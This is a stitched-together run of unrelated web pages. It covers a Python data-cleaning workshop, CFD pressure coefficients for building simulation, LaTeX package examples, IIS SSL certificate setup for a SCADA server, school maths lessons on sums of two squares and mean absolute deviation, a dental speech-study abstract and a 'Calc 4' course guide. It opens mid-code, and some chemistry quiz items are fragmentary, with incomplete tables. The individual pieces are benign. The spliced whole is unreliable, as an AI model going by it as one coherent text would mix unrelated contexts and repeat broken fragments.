blue_points = np.concatenate((
0.2*np.random.randn(25, 2) + np.array([[0, 1]]*25),
0.2*np.random.randn(25, 2) + np.array([[1, 0]]*25)
))
You’re right! I accidentally embedded the wrong code cell. It is now fixed.
The series of posts are really good and I am going through them trying to absorb and implement as much as possible.
One question about the multi-layer perceptron. Here we are only considering one perceptron per layer, is that right?
Histograms and Inverting Skewed Data
Welcome! This workshop is from Winder.ai. Sign up to receive more free workshops, training and videos.
When we first receive some data, it can be in a mess. If we tried to force that data into a model it is more than likely that the results will be useless.
So we need to spend a significant amount of time cleaning the data. This workshop is all about bad data.
# These are the standard imports that we will use all the time.
import os                            # Library to do things on the filesystem
import pandas as pd                  # Super cool general purpose data handling library
import matplotlib.pyplot as plt      # Standard plotting library
import numpy as np                   # General purpose math library
from IPython.display import display  # A notebook function to display more complex data (like tables)
import scipy.stats as stats          # Scipy again
Dummy data investigation
For this part of the workshop we’re going to create some “dummy” data. Dummy data is great for messing around with new tools and technologies. And they serve as reference datasets for people to compete against.
However, as you will see, dummy data is never as complex as the real world…
# Generate some data
np.random.seed(42)  # To ensure we get the same data every time.
X = (np.random.randn(100,1) * 5 + 10)**2
print(X[:10])
[[ 155.83953905] [ 86.65149531] [ 175.25636487] [ 310.29348423] [ 77.9553576 ] [ 77.95680717] [ 320.26910947] [ 191.4673745 ] [ 58.56271638] [ 161.61528938]]
Let’s print the mean and standard deviation of this data.
# Print the mean and standard deviation
print("Raw: %0.3f +/- %0.3f" % (np.mean(X), np.std(X)))
Raw: 110.298 +/- 86.573
This is telling us that we should expect to see approximately two thirds of the values to occur in the range 110 +/- 87. However, this data is not quite as it seems.
A histogram is one of the most basic but useful plots you can use to visualise the data contained within a feature.
If we imagine a range of bins, in this example let’s imagine bins that are 25 wide and extend from zero up to 350 ish. What we can do is count the number of times that we see an observation falling within each bin. This is known as a Histogram (often we also perform some scaling to the raw counts, but we’ll ignore that for now).
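The counting described above is exactly what NumPy's histogram function does; here is a small sketch with made-up values and 25-wide bins:

```python
import numpy as np

values = np.array([3.0, 7.5, 12.0, 26.0, 30.0, 31.5, 49.0])  # made-up observations
counts, edges = np.histogram(values, bins=[0, 25, 50])
# Three observations fall in the bin [0, 25) and four in the bin [25, 50].
```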
Let’s plot the histogram of the above data to see what’s going on.
df = pd.DataFrame(X)  # Create a pandas DataFrame out of the numpy array
df.plot.hist(alpha=0.5, bins=15, grid=True, legend=None)  # Pandas helper function to plot a hist. Uses matplotlib under the hood.
plt.xlabel("Feature value")
plt.title("Histogram")
plt.show()
We can see that the data appears pretty noisy, and it's strangely skewed.

With experience, you would notice that all the data are positive, which is strange. You would also notice that there appears to be a downward-curved slope from a feature value of 0 to 350.
This is indicating some sort of power law, or exponential.
We can transform the data, by trying to invert the mathematical operation that has occured up to the point where we measured it. This is ok, we’re not altering the data, we’re just changing how it is represented.
df_exp = df.apply(np.log)  # pd.DataFrame.apply accepts a function to apply to each column of the data
df_exp.plot.hist(alpha=0.5, bins=15, grid=True, legend=None)
plt.xlabel("Feature value")
plt.title("Histogram")
plt.show()
Ok, that still looks a bit weird. I wonder if it’s a power law?
df_pow = df.apply(np.sqrt)
df_pow.plot.hist(alpha=0.5, bins=15, grid=True, legend=None)
plt.xlabel("Feature value")
plt.title("Histogram")
plt.show()
That’s looking much better! So it looks like it is a power law (to the power of 2). But to be sure, let’s fit a normal curve over the top…
param = stats.norm.fit(df_pow)  # Fit a normal distribution to the data
x = np.linspace(0, 20, 100)     # Linear spacing of 100 elements between 0 and 20.
pdf_fitted = stats.norm.pdf(x, *param)  # Use the fitted parameters to create the y datapoints

# Plot the histogram again
df_pow.plot.hist(alpha=0.5, bins=15, grid=True, normed=True, legend=None)

# Plot some fancy text to show us what the parameters of the distribution are (mean and standard deviation)
plt.text(x=np.min(df_pow), y=0.1,
         s=r"$\mu=%0.1f$" % param[0] + "\n" + r"$\sigma=%0.1f$" % param[1], color='r')

# Plot a line of the fitted distribution over the top
plt.plot(x, pdf_fitted, color='r')

# Standard plot stuff
plt.xlabel("Feature value")
plt.title("Histogram with fitted normal distribution")
plt.show()
Yeah, definitely looking pretty good. Always try to visualise your data to make sure it conforms to your expectations
Remember that some algorithms don’t like data that isn’t centred around 0 and they don’t like it when the standard deviation isn’t 1.
So we transform the data by scaling it with the StandardScaler from scikit-learn.
from sklearn import preprocessing

X_s = preprocessing.StandardScaler().fit_transform(df_pow)
X_s = pd.DataFrame(X_s)  # Put the np array back into a pandas DataFrame for later
print("StandardScaler: %0.3f +/- %0.3f" % (np.mean(X_s), np.std(X_s)))  # Nice! This should be 0.000 +/- 1.000
StandardScaler: -0.000 +/- 1.000
param = stats.norm.fit(X_s)
x = np.linspace(-3, 3, 100)
pdf_fitted = stats.norm.pdf(x, *param)

X_s.plot.hist(alpha=0.5, bins=15, grid=True, normed=True, legend=None)
plt.text(x=np.min(df_pow), y=0.1,
         s=r"$\mu=%0.1f$" % param[0] + "\n" + r"$\sigma=%0.1f$" % param[1], color='r')
plt.xlabel("Feature value")
plt.title("Histogram with fitted normal distribution")
plt.plot(x, pdf_fitted, color='r')
plt.show()
1. Why ?
In Building Energy Simulation (BES) software, pressure coefficients are generally given by correlations according to the angle of incidence and the shape of the building [Swami & Chandra 1988], or by tabulated values that are unsuitable for most real-life situations: for example, Figure 1 below shows the values used by some BES tools to determine the pressure coefficients C_p .
The calculated natural ventilation flows are therefore very likely to be incorrect if they are estimated from the default values (see also our article on reducing uncertainties in natural ventilation).
First, the pressure coefficients per façade element must be computed, depending on the wind orientation and magnitude (an illustration of the pressure field on a building is given in Figure 2).
Each pressure coefficient must then be assigned to the correct façade element. To achieve this, we go through the file defining the BES problem (" *.idf " file in EnergyPlus) and replace the pressure coefficient for each opening and each wall, in order to calculate the flow rates related to infiltrations.
This technique has two main advantages:
- Compared to a direct use of the flowrates computed with CFD, this preserves the thermal buoyancy effects related to the temperature difference between inside and outside.
- The number of pressure coefficients per wind direction is increased: by default they are given every 45 degrees, while we use a step of at most 30 degrees.
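Between two simulated directions, the pressure coefficient is typically interpolated. The following sketch shows periodic linear interpolation over CFD results taken every 30 degrees; the C_p values are invented for illustration only:

```python
import numpy as np

# Hypothetical Cp values from CFD, one per 30-degree wind direction, for one facade element.
sim_angles = np.arange(0, 360, 30)
sim_cp = np.array([0.6, 0.4, 0.1, -0.3, -0.5, -0.4, -0.3, -0.4, -0.5, -0.3, 0.1, 0.4])

def cp_at(theta):
    """Linearly interpolate Cp at any wind direction, wrapping around at 360 degrees."""
    ext_angles = np.append(sim_angles, 360.0)
    ext_cp = np.append(sim_cp, sim_cp[0])  # the pattern is periodic: Cp(360) = Cp(0)
    return float(np.interp(theta % 360.0, ext_angles, ext_cp))
```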
The question is then: how many wind directions should we simulate for a better prediction of wind-induced natural ventilation? The next section gives some insight into this topic.
3. Influence of angular discretization
Figure 4 below shows the natural ventilation rate in a largely glazed train station atrium. The different lines plotted correspond to an increasing number of wind directions simulated: for instance "4 directions" means one simulation is done every 90° and "24 directions" means one simulation every 15°.
One can see that from 8 directions (id est \Delta\theta=45°), the differences tend to decrease. The error gap between 12 and 24 simulations is relatively low, which in the presented context would advocate for only 12 CFD simulations. A more thorough quantitative analysis is available at Techniques de l'Ingénieur website.
The Mouse's Tale in LaTeX
This example from section three of the LaTeX verse package documentation demonstrates an ambitious use of \indentpattern to create a striking visual effect. In this case it is defined to recreate the famous typesetting of the original Mouse's Tale as it appeared in print.
Background: "The Mouse's Tale" is a poem by Lewis Carroll involving a 'quadruple pun' which appears in his novel Alice's Adventures in Wonderland. It uses typesetting style to create the final pun (it is a mouse's tale typeset in the shape of a mouse's tail).
For more details see the poem's Wikipedia entry.
The Chicago Citation Style with biblatex
The biblatex-chicago package implements the citation style of the Chicago Manual of Style, 16th edition. In this example, the notes option causes biblatex's autocite command to put citations in footnotes. The package can also produce inline author-year citations in the Chicago style. See the package documentation for more information.
Bibliographies with biber and biblatex
This example shows how to automatically generate citations and a bibliography with biblatex and biber.
Biblatex and biber work together to automatically format references and citations like the older cite or natbib and bibtex tool chain, but they offer more powerful and easier to use formatting and better support for special characters (unicode).
For a full list of biblatex styles, see the user guide in the biblatex manual.
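A minimal document skeleton for the biblatex/biber workflow looks like the following; the bibliography file name and the entry key are placeholders:

```latex
\documentclass{article}
\usepackage[backend=biber, style=authoryear]{biblatex}
\addbibresource{references.bib} % your .bib database

\begin{document}
Some claim \autocite{knuth1984}. % hypothetical entry key
\printbibliography
\end{document}
```

Compile with pdflatex, then run biber, then pdflatex again to resolve the citations.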
LaTeX Bibliography Example: The natbib Package
The natbib package provides automatic numbering, sorting and formatting of in-text citations and bibliographic references in LaTeX. It supports both numeric and author-year citation styles.
The natbib package is the most commonly used package for handling references in LaTeX, and it is very functional, but the more modern biblatex package is also worth a look.
The IIS server where a Merbon SCADA server is installed should contain an SSL security certificate. Otherwise most browsers will consider the site insecure and show warning messages, or refuse to display the web pages completely.
HTTPS/SSL protocol can secure the data travelling between client and server and back. This means that the data flow between the browser and the server can not be monitored by a third party. Standard TCP port for HTTPS/SSL communication is 443, while HTTP standard port is 80.
The addresses of web pages secured with SSL start with the https:// protocol name. The browsers display a padlock icon in the address row, and tinge the address with different colours: green for full compliance, yellow or orange for a secured page with problems (such as containing a valid certificate issued for another domain), and red for a wrong certificate. If the certificate has been created using OpenSSL or IIS (self-signed certificate) the browser may show a message that the web is not trustworthy when accessed over the Internet. This problem can be solved by a certificate issued by an external authority.
Issuing a certificate by an external authority is a paid service (about 10 to 50 € per year). The price depends on the trustworthiness of the issuing authority, validity length of the certificate, degree of security, etc. The certificates must be prolonged as their validity is limited by time. The expiration date is stored directly in the certificate, and can be viewed e.g. in a web browser. As soon as the certificate expires, it is automatically considered invalid. Maximum validity length is usually 2 years. This means that even if the server is certified at the installation time, it loses its validity after maximum two years of operation, and SCADA „stops working“ just by itself. This is long before the warranty time ends (which may be up to 5 years at the turnkey projects).
If the Merbon SCADA server is operated exclusively in an intranet, i.e. without access from the Internet, using SSL is not necessary and browsers tend to accept unencrypted connection too (http://, TCP port 80). Then the standard installation manual for Merbon SCADA server setup is to be followed.
If the Merbon SCADA server shall be accessible from the Internet, the IIS server should have a SSL certificate installed. The certificate is issued by a certification authority. It is bound to the domain name which is used to access the server, for example merbonscada.company.com. This name has to be agreed with the IT manager of the network the server is installed in. The IT must also configure the network so that the server is available from the Internet.
A certificate is a file with .pfx extension. There are also other certificate formats, however, the IIS server requires a .pfx file. The file is imported in the IIS server settings (Server certificates) and then selected in the MerbonScada_Web configuration (Bindings, Add…, Type: https to port 443, and select the certificate file which was imported in the previous step).
As a certificate is subject to expiration, it must be updated regularly. At system (turnkey) projects supplied by Domat, Domat as a supplier guarantees a valid certificate for a period of 2 years or until the end of the warranty time according to the contract. Then a new certificate must either be ordered extra as a post-warranty service, or obtained by the site owner or operator.
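Because an expired certificate silently breaks access, it is worth monitoring the expiry date from a script. A sketch using only the Python standard library follows; the helper below is ours, not part of Merbon SCADA, and the `notAfter` string is in the OpenSSL text format that `ssl.SSLSocket.getpeercert()` returns:

```python
import ssl
from datetime import datetime, timezone

def days_until_expiry(not_after: str) -> float:
    """Days from now until a certificate's notAfter timestamp; negative if expired."""
    expires_ts = ssl.cert_time_to_seconds(not_after)  # parses e.g. 'Jun 09 12:00:00 2025 GMT'
    expires = datetime.fromtimestamp(expires_ts, tz=timezone.utc)
    return (expires - datetime.now(timezone.utc)).total_seconds() / 86400.0

# In practice the string would come from a live TLS connection, e.g.:
#   with socket.create_connection((host, 443)) as sock:
#       with ssl.create_default_context().wrap_socket(sock, server_hostname=host) as tls:
#           not_after = tls.getpeercert()["notAfter"]
```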
If the Merbon SCADA licence is supplied as a product, the system integrator or IT department of the IIS server owner are fully responsible for issuing of a certificate, its installation and configuration of the IIS server. All system integrators are asked to get to know the SSL problematics and the Merbon SCADA Server environment thoroughly before the commissioning starts. It is advised to organize the connection to the Internet, domain name and issuing of a certificate in advance. It saves time spent on commissioning. Please note that the IIS server configuration takes about 30 minutes plus time required for communication with the local IT and a certification authority.
In general, for the issuing of the certificate, its installation and updates, the IIS server operator is responsible rather than the SCADA system supplier.
Open the IIS Manager (the InetMgr.exe file in C:\Windows\System32\inetsrv)
Select the server and click Server certificates: Select Actions – Import:
Select the certificate file and enter the import password provided by the issuing authority. Click OK. The certificate is now imported in the server.
In the IIS settings select the Merbon SCADA web and in the properties go to Edit web, Bindings… Add a https binding and select the imported certificate. Confirm by OK and restart the web. The web is now certified.
Season 3 Episode 1
Dr Vicky Neale joins the stream for episode 1 with a problem for us: which numbers can be written as the sum of two squares?
Sums of two squares
The main question from the livestream was;
Which numbers can be written as the sum of two squares?
Here are some of the conjectures you made in the livestream;
- A square is a sum of two squares
- Numbers that are a square plus 1, 4, 9, … are sums of two squares
- Powers of 2 (or 5) are sums of two squares.
- The largest number in a Pythagorean triple is a sum of two squares in $\geq 2$ ways.
- If n is a sum of two squares then so is 2n
- A number 3, 6, or 7 (mod 8) is not a sum of two squares
- If n, m are sums of two squares then so is nm.
Can you make any more conjectures of your own? Can you prove (or disprove!) them?
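A short brute-force search is a good way to generate data for testing conjectures like these:

```python
from math import isqrt

def is_sum_of_two_squares(n):
    """True if n = a**2 + b**2 for some integers a, b >= 0."""
    for a in range(isqrt(n) + 1):
        b_squared = n - a * a
        if isqrt(b_squared) ** 2 == b_squared:
            return True
    return False

representable = [n for n in range(1, 31) if is_sum_of_two_squares(n)]
# representable == [1, 2, 4, 5, 8, 9, 10, 13, 16, 17, 18, 20, 25, 26, 29]
```

Try extending the search range and checking the conjectures above against the output — for instance, the remainders mod 8 of the numbers that are missing.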
If you like this, you might also like to try adding other numbers of squares (for example, what numbers can you make by adding three squares?). Some versions of this question are easy (which numbers can you make by adding one square) and some are hard – it’s sometimes difficult to guess which is which.
Someone asked if we’re going to publish this research. Unfortunately, other mathematicians who came before us have worked out answers to these problems already. Do not look at these until you’ve had all the fun that you can have exploring – once you’ve seen the full answer, you can’t unsee it! Exploring places that have already been explored before is still fun, like climbing a mountain rather than taking the ski-lift. You learn a lot more about climbing if you don’t take the ski lift, even if you don’t make it all the way to the top.
Answers (don’t look at these)
Complex numbers, primes, and residues
For more complex numbers and primes, see Season 2 episode 3 with Ittihad.
For more on quadratic residues (the remainders that you can get by dividing square numbers by a particular number), see Season 1 episode 0 with James.
Complex numbers, quaternions, and more
When complex numbers came up, someone in chat mentioned more the obscure quaternions and octonions. These are “higher dimensional” versions of complex numbers, which you might be interested in (but you certainly won’t learn about these in A-level or equivalent!)
- More on complex numbers; An Introduction to Complex Numbers
- Quaternions; Curious quaternions
- Octonions; Ubiquitous octonions
More Vicky Neale
Vicky has two books that you might be interested in if you liked this episode;
- Closing the gap is the story of cutting-edge research in prime number theory, with plenty of things for you to investigate yourself along the way.
- Why study Mathematics? has lots more information about what mathematics is like at university and why you should consider studying it.
Vicky has previously appeared on the OOMC in Season 2 episode 0 with a different problem involving squares.
For a six-week maths summer school with Vicky (and other people!), see PROMYS.
The application is free, and you might find the application problems fun, even if you’re not going to apply.
For a summer school with James (and other people!) and lots of online support between April and December with your university applications (especially Oxford), see UNIQ.
This course is a free programme for UK state-school students, and we prioritise students with good grades from backgrounds that are under-represented at Oxford.
If you want to get in touch with us about any of the mathematics in the video or the further reading, feel free to email us on oomc [at] maths.ox.ac.uk. | <urn:uuid:88e10137-fff3-4ef5-bd72-a9ae1fdf5925> | CC-MAIN-2023-14 | https://www.maths.ox.ac.uk/outreach/oxford-online-maths-club/season-3-episode-1 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945317.85/warc/CC-MAIN-20230325064253-20230325094253-00415.warc.gz | en | 0.950353 | 867 | 2.75 | 3 |
Labels Used in Algebra
\[\pi\] is a very special number, special enough to have a symbol to label it.
Less special numbers have letters to label them. Unknown numbers are labelled
\[x\] and \[y\], as are coordinate axes, though other symbols can be used.
Integers are generally labelled
\[n\] (the 'natural numbers' are the positive integers) and \[m\].
Lengths can be labelled by lots of different letters:
\[a, \: b, \: c\] are used for triangles,
\[a, \: b, \: h\] are used for trapeziums, and
\[r\] is used for the radius of a circle.
\[l\] is used to label the length of an arc - part of the perimeter - of a circle, and
\[s\] is used to label the slant height of a cone.
Variability and MAD
5.1: Shooting Hoops (Part 1)
Elena, Jada, and Lin enjoy playing basketball during recess. Lately, they have been practicing free throws. They record the number of baskets they make out of 10 attempts. Here are their data sets for 12 school days.
- Calculate the mean number of baskets each player made, and compare the means. What do you notice?
- What do the means tell us in this context?
5.2: Shooting Hoops (Part 2)
The tables show Elena, Jada, and Lin’s basketball data from an earlier activity. Recall that the mean of Elena’s data, as well as that of Jada and Lin’s data, was 5.
- Record the distance between each of Elena’s scores and the mean.
|Elena|4|5|1|6|9|7|2|8|3|3|5|7|
|distance from 5|1| | |1| | | | | | | | |
Now find the average of the distances in the table. Show your reasoning and round your answer to the nearest tenth.
This value is the mean absolute deviation (MAD) of Elena’s data.
Elena’s MAD: _________
- Find the mean absolute deviation of Jada’s data. Round it to the nearest tenth.
|Jada|2|4|5|4|6|6|4|7|3|4|8|7|
|distance from 5| | | | | | | | | | | | |
Jada’s MAD: _________
- Find the mean absolute deviation of Lin’s data. Round it to the nearest tenth.
|Lin|3|6|6|4|5|5|3|5|4|6|6|7|
|distance from 5| | | | | | | | | | | | |
Lin’s MAD: _________
Compare the MADs and dot plots of the three students’ data. Do you see a relationship between each student’s MAD and the distribution on her dot plot? Explain your reasoning.
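Once you have computed the three MADs by hand, a short Python sketch like this one can check the arithmetic (the helper name `mad` is just a convenient label, not standard notation):

```python
def mad(data):
    # Mean absolute deviation: the average distance of the values from the mean.
    mean = sum(data) / len(data)
    return sum(abs(x - mean) for x in data) / len(data)

elena = [4, 5, 1, 6, 9, 7, 2, 8, 3, 3, 5, 7]
jada = [2, 4, 5, 4, 6, 6, 4, 7, 3, 4, 8, 7]
lin = [3, 6, 6, 4, 5, 5, 3, 5, 4, 6, 6, 7]

for name, data in [("Elena", elena), ("Jada", jada), ("Lin", lin)]:
    print(name, round(mad(data), 1))  # Elena 2.0, Jada 1.5, Lin 1.0
```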
Invent another data set that also has a mean of 5 but has a MAD greater than 2. Remember, the values in the data set must be whole numbers from 0 to 10.
5.3: Which Player Would You Choose?
Andre and Noah joined Elena, Jada, and Lin in recording their basketball scores. They all recorded their scores in the same way: the number of baskets made out of 10 attempts. Each collected 12 data points.
- Andre’s mean number of baskets was 5.25, and his MAD was 2.6.
- Noah’s mean number of baskets was also 5.25, but his MAD was 1.
Here are two dot plots that represent the two data sets. The triangle indicates the location of the mean.
- Without calculating, decide which dot plot represents Andre’s data and which represents Noah’s. Explain how you know.
- If you were the captain of a basketball team and could use one more player on your team, would you choose Andre or Noah? Explain your reasoning.
- An eighth-grade student decided to join Andre and Noah and kept track of his scores. His data set is shown here. The mean number of baskets he made is 6.
|eighth-grade student|6|5|4|7|6|5|7|8|5|6|5|8|
|distance from 6| | | | | | | | | | | | |
- Calculate the MAD. Show your reasoning.
- Draw a dot plot to represent his data and mark the location of the mean with a triangle (\(\Delta\)).
- Compare the eighth-grade student’s mean and MAD to Noah’s mean and MAD. What do you notice?
- Compare their dot plots. What do you notice about the distributions?
- What can you say about the two players’ shooting accuracy and consistency?
Invent a data set with a mean of 7 and a MAD of 1.
5.4: Swimmers Over the Years
In 1984, the mean age of swimmers on the U.S. women’s swimming team was 18.2 years and the MAD was 2.2 years. In 2016, the mean age of the swimmers was 22.8 years, and the MAD was 3 years.
- How has the average age of the women on the U.S. swimming team changed from 1984 to 2016? Explain your reasoning.
- Are the swimmers on the 1984 team closer in age to one another than the swimmers on the 2016 team are to one another? Explain your reasoning.
Here are dot plots showing the ages of the women on the U.S. swimming team in 1984 and in 2016. Use them to make two other comments about how the women’s swimming team has changed over the years.
We use the mean of a data set as a measure of center of its distribution, but two data sets with the same mean could have very different distributions.
This dot plot shows the weights, in grams, of 22 cookies.
The mean weight is 21 grams. All the weights are within 3 grams of the mean, and most of them are even closer. These cookies are all fairly close in weight.
This dot plot shows the weights, in grams, of a different set of 30 cookies.
The mean weight for this set of cookies is also 21 grams, but some cookies are half that weight and others are one-and-a-half times that weight. There is a lot more variability in the weight.
There is a number we can use to describe how far away, or how spread out, data points generally are from the mean. This measure of spread is called the mean absolute deviation (MAD).
Here the MAD tells us how far cookie weights typically are from 21 grams. To find the MAD, we find the distance between each data value and the mean, and then calculate the mean of those distances.
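Written symbolically (with \(x_1, x_2, \ldots, x_n\) for the data values and \(\bar{x}\) for their mean), the procedure just described is:

\[\text{MAD} = \frac{1}{n}\sum_{i=1}^{n}\left|x_i - \bar{x}\right|\]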
For instance, the point that represents 18 grams is 3 units away from the mean of 21 grams. We can find the distance between each point and the mean of 21 grams and organize the distances into a table, as shown.
|weight in grams|18|19|19|19|20|20|20|20|21|21|21|21|21|22|22|22|22|22|22|23|23|24|
|distance from mean|3|2|2|2|1|1|1|1|0|0|0|0|0|1|1|1|1|1|1|2|2|3|
The values in the first row of the table are the cookie weights for the first set of cookies. Their mean, 21 grams, is the mean of the cookie weights.
The values in the second row of the table are the distances between the values in the first row and 21. The mean of these distances is the MAD of the cookie weights.
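As a check on these numbers, the same calculation can be sketched in Python (an optional aid; the variable names here are ours):

```python
# Weights of the 22 cookies from the table above, in grams.
weights = [18, 19, 19, 19, 20, 20, 20, 20, 21, 21, 21,
           21, 21, 22, 22, 22, 22, 22, 22, 23, 23, 24]

mean = sum(weights) / len(weights)
distances = [abs(w - mean) for w in weights]
mad = sum(distances) / len(distances)

print(mean)           # 21.0
print(round(mad, 1))  # 1.2
```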
What can we learn from the averages of these distances once they are calculated?
- In the first set of cookies, the distances are all between 0 and 3. The MAD is 1.2 grams, which tells us that the cookie weights are typically within 1.2 grams of 21 grams. We could say that a typical cookie weighs between 19.8 and 22.2 grams.
- In the second set of cookies, the distances are all between 0 and 13. The MAD is 5.6 grams, which tells us that the cookie weights are typically within 5.6 grams of 21 grams. We could say a typical cookie weighs between 15.4 and 26.6 grams.
The MAD is also called a measure of the variability of the distribution. In these examples, it is easy to see that a higher MAD suggests a distribution that is more spread out, showing more variability.
- average
The average is another name for the mean of a data set.
For the data set 3, 5, 6, 8, 11, 12, the average is 7.5.
\(45 \div 6 = 7.5\)
- mean
The mean is one way to measure the center of a data set. We can think of it as a balance point. For example, for the data set 7, 9, 12, 13, 14, the mean is 11.
To find the mean, add up all the numbers in the data set. Then, divide by how many numbers there are. \(7+9+12+13+14=55\) and \(55 \div 5 = 11\).
- mean absolute deviation (MAD)
The mean absolute deviation is one way to measure how spread out a data set is. Sometimes we call this the MAD. For example, for the data set 7, 9, 12, 13, 14, the MAD is 2.4. This tells us that the values are typically 2.4 units away from the mean, which is 11.
To find the MAD, add up the distances between each data point and the mean. Then, divide by how many numbers there are.
\(4+2+1+2+3=12\) and \(12 \div 5 = 2.4\)
- measure of center
A measure of center is a value that seems typical for a data distribution.
Mean and median are both measures of center. | <urn:uuid:5b376139-857e-4726-a25a-b330eeb1202b> | CC-MAIN-2023-14 | https://im.kendallhunt.com/MS_ACC/students/1/8/5/index.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943746.73/warc/CC-MAIN-20230321193811-20230321223811-00216.warc.gz | en | 0.947596 | 2,020 | 3.859375 | 4 |
Turkish Journal of Medical Sciences
The effect of early loss of anterior primary tooth on speech production in preschool children
Early childhood caries (ECC) is a progressive form of dental caries in children that may cause premature loss of the anterior primary teeth. In this study, the aim was to investigate the effects of primary anterior tooth loss and removable dentures on the speech of children with ECC. Materials and methods: The study included 15 patients with ECC who required extraction of the primary anterior teeth and needed dentures (case group), and 15 healthy children (control group). The articulation of the control group was evaluated once, and that of the case group was evaluated before and after extraction, before and after dentures, and at the follow-up exam. The errors of both groups, and those within the case group across the 5 periods, were compared statistically. Results: It was found that tooth loss did not influence articulation. However, dentures temporarily affected articulation of the [s], [ʃ], and [z] speech sounds. Conclusion: It was concluded that although dentures may cause articulation disorders, children have an ability to compensate for the differences and articulate speech sounds correctly.
Early childhood caries, articulation disorders, speech
TURGUT, MELEK DİLEK; GENÇ, GÜLSÜM AYDAN; BAŞAR, FİGEN; and TEKÇİÇEK, MERYEM UZAMIŞ
"The effect of early loss of anterior primary tooth on speech production in preschool children,"
Turkish Journal of Medical Sciences: Vol. 42: No. 5, Article 18.
Available at: https://journals.tubitak.gov.tr/medical/vol42/iss5/18 | <urn:uuid:6300da13-17d3-4f2a-9959-da9de9ffca90> | CC-MAIN-2023-14 | https://journals.tubitak.gov.tr/medical/vol42/iss5/18/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948858.7/warc/CC-MAIN-20230328104523-20230328134523-00216.warc.gz | en | 0.925098 | 435 | 2.65625 | 3 |
When the excited electron of a H atom from n = 5 drops to the ground state, the maximum number of emission lines observed is _____________.
If the work function of a metal is $$6.63 \times 10^{-19}$$ J, the maximum wavelength of the photon required to remove a photoelectron from the metal is ____________ nm. (Nearest integer)
[Given : $$h = 6.63 \times 10^{-34}$$ J s, and $$c = 3 \times 10^{8}$$ m s$$^{-1}$$]
Consider the following sets of quantum numbers.
|A.|3|3|$$-3$$|
|B.|3|2|$$-2$$|
The number of correct sets of quantum numbers is __________.
If the uncertainty in velocity and position of a minute particle in space are $$2.4 \times 10^{-26}$$ m s$$^{-1}$$ and $$10^{-7}$$ m respectively, the mass of the particle in g is ____________. (Nearest integer)
(Given : $$h = 6.626 \times 10^{-34}$$ J s)
The course Calc 4 or Calculus 4 may differ in every institution that offers or teaches the course. It involves a wide range of branches or subfields of calculus necessary in the further understanding of the vast field of calculus. Calculus is a certain branch of mathematics that deals with continuous change. In this complete guide, we’ll discuss the different sides of calculus 4 and what to expect when you go through the course.
What Is Calc 4?
According to Thomas Edison State University, Calculus 4 is an intensive, higher-level course in mathematics that builds on Calculus 2 and Calculus 3 and focuses on the calculus of real-and-vector valued functions of one and several variables. The topics that will be discussed in this course are infinite sequences and series, convergence tests, power series, Taylor Series, and polynomials and their numerical approximations.
Type of Calculus
Most probably, when you take up Calculus 4 you will already have taken a series of calculus courses beforehand, and Calc 4 is just a continuation of those courses. It could also be taken alongside other calculus courses that are not prerequisites of Calculus 4.
Since we already mentioned that Calculus 4 is not universal and definitely will vary depending on the university or school you are in, we list some of the possible calculus course that will be assigned to you when you enroll in Calc 4.
• Differential Calculus
• Integral Calculus
• Vector Calculus
• Multivariable Calculus
• Complex Calculus
Most of the time, Vector Calculus and Multivariable Calculus are considered the same or will belong to one course. Calculus 4 falls under higher calculus since it is already the 4th calculus course you will take. Thus, Calc 4 cannot be Basic Calculus or another fundamental calculus subfield.
We will try to dissect each calculus subfield that may be your next Calculus 4.
Differential calculus focuses on investigation of the methods used in solving first- and second-order ordinary differential equations, systems of differential equations, Laplace transforms, and power series problems.
The course will highlight the following lessons:
- Fundamental techniques in solving first-order and higher-order differential equations that includes linear and non-linear
- Mathematical modelling
- Laplace Transforms generated as a tool in solving differential and integral equations
- Eigenvector analysis utilized in finding solutions to linear systems of differential equations
- Power series
Among the optional subjects are:
- Fourier Series
- Partial Differential Equations
Integral calculus is another component of calculus that is focused on the consequences, uses, and theories involving integrals. It is heavily concerned with area and volumes that can be graphed in a coordinate plane. The fundamental theorem of calculus, which demonstrates how a definite integral is determined by employing its antiderivative, connecting the two disciplines: differential and integral calculus.
Vector calculus is a certain branch of calculus that thrives on the differentiation and integration of vector fields, mainly applied on three-dimensional Euclidean space. Most of the time, vector calculus is used as a shorthand for the more general area of Multivariable Calculus. Moreover, vector calculus also deals with integrals particularly line integrals and surface integrals.
What is the Vector-Valued Function?
The vector-valued function is a function $r$ where the domain is the set of real numbers $t$ and the range is the set of vectors $r(t)$. The vector $r(t)$ is in the form
$$r(t) = f(t)\,i + g(t)\,j + h(t)\,k,$$
where $f$, $g$, and $h$ are real-valued functions.
The vector-valued function defines a curve in a 3D space by defining vectors from the origin that point to all the points on the curve for values of $t$.
Consider $r(t)=4\cos(t)\,i+3\sin(t)\,j$. This function can be written as:
$$r(t)=\langle 4\cos(t),\, 3\sin(t)\rangle.$$
Since $4\cos(t)$ and $3\sin(t)$ are defined for all real numbers, the domain of the function $r$ is the set of real numbers. Now, we know that the range of $\cos(t)$ for all real numbers $t$ is $[-1,1]$, so it follows that the range of $4\cos(t)$ is $[-4,4]$. For $\sin(t)$, the range is $[-1,1]$, hence the range of $3\sin(t)$ is $[-3,3]$.
Therefore, the range of $r(t)$ is the set of vectors containing $\langle a,b\rangle$, where $a\in[-4,4]$, and $b\in[-3,3]$.
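A quick numerical check of this example — sampling many points of $r(t)=4\cos(t)\,i+3\sin(t)\,j$ and confirming the components stay inside the stated intervals (a sketch; the sampling grid of 1000 points is an arbitrary choice):

```python
import math

# Sample r(t) = 4cos(t) i + 3sin(t) j at many values of t and confirm that
# the components stay inside [-4, 4] and [-3, 3] respectively.
def r(t):
    return (4 * math.cos(t), 3 * math.sin(t))

points = [r(2 * math.pi * k / 1000) for k in range(1000)]

print(all(-4 <= a <= 4 for a, b in points))  # True
print(all(-3 <= b <= 3 for a, b in points))  # True
```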
Some Calc 4 Textbooks You Can Use
We provide some of the textbooks that might help you with your studies in Calculus 4.
- CLP-4 Vector Calculus by Joel Feldman, Andrew Rechnitzer, and Elyse Yeager, 2017-21
- Introduction to Differential Calculus: Systematic Studies with Engineering Applications for Beginners by Ulrich L. Rohde, G. C. Jain, Ajay K. Poddar, and A. K. Ghosh, 2011
- Vector Calculus by Paul C. Matthews, 1998
- Calculus by James Stewart, 2015
Take note that before choosing a calculus 4 textbook, check the course content and check whether the topics listed are covered in the textbook. This is to maximize the aid of your textbook in your studies.
